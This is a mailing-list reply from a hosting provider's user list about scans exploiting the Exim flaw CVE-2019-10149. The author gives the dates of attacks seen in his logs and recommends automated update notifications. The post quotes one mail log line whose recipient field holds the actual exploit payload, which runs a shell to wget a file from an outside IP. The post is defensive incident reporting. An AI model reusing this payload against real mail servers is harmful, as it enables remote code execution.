Author: Ian Date: To: users Subject: Re: [bitfolk] Scans attempting to exploit CVE-2019-10149 have been
in the wild for some days
Adam Spiers said:
> Phew... I think?! The depressing thing is that there's no way to know for sure whether I patched in time, even with things like rkhunter already in place. .. I patched 15 days ago (7th June), and I see 15 remote exploit attempts in the rejectlogs from the last 7 days alone - unfortunately my logrotate already ditched logs from the previous week.
For a number of reasons, I keep mail logs rather longer than that, so
I can see that on my only VPS that is open to accepting email, attacks
started on the 18th:
Jun 18 23:25:22 example postgrey[730]: action=greylist, reason=new,
client_name=host34-234-19-46.soho.nordext.net,
client_address=46.19.234.34, sender=support@???,
recipient=root+${run{x2Fbinx2Fsht-ctx22wgetx20213.227.155.101x2ftmpx2f1.2.3.4x22}}@???
.. and while there have been attempts since then, there's nothing
similar before that.
As you can see, that VPS runs postfix anyway. It's possible some
attackers look for the name of the mail server program before trying
to run the actual exploit, and so wouldn't show in postfix logs, but I
think it's unlikely that this is something the first ones would do.
All my other VPSes have exim4 (and were updated on the 5th) but only
to send email: with the exception of the ssh, http/https, and a couple
of other ports, all incoming ports on those are closed by the
firewall.
Fortunately.
> Thanks again to Andy, without whose warning I would definitely not have known to patch my exim quickly enough!
It's well worth having something do regular (hourly?) 'apt-get
updates' and email you if there is anything to upgrade. I'm not quite
ready to do automatic upgrades, because occasionally Debian do get
something wrong, but having instant-ish notice that there are upgrades
is very useful.
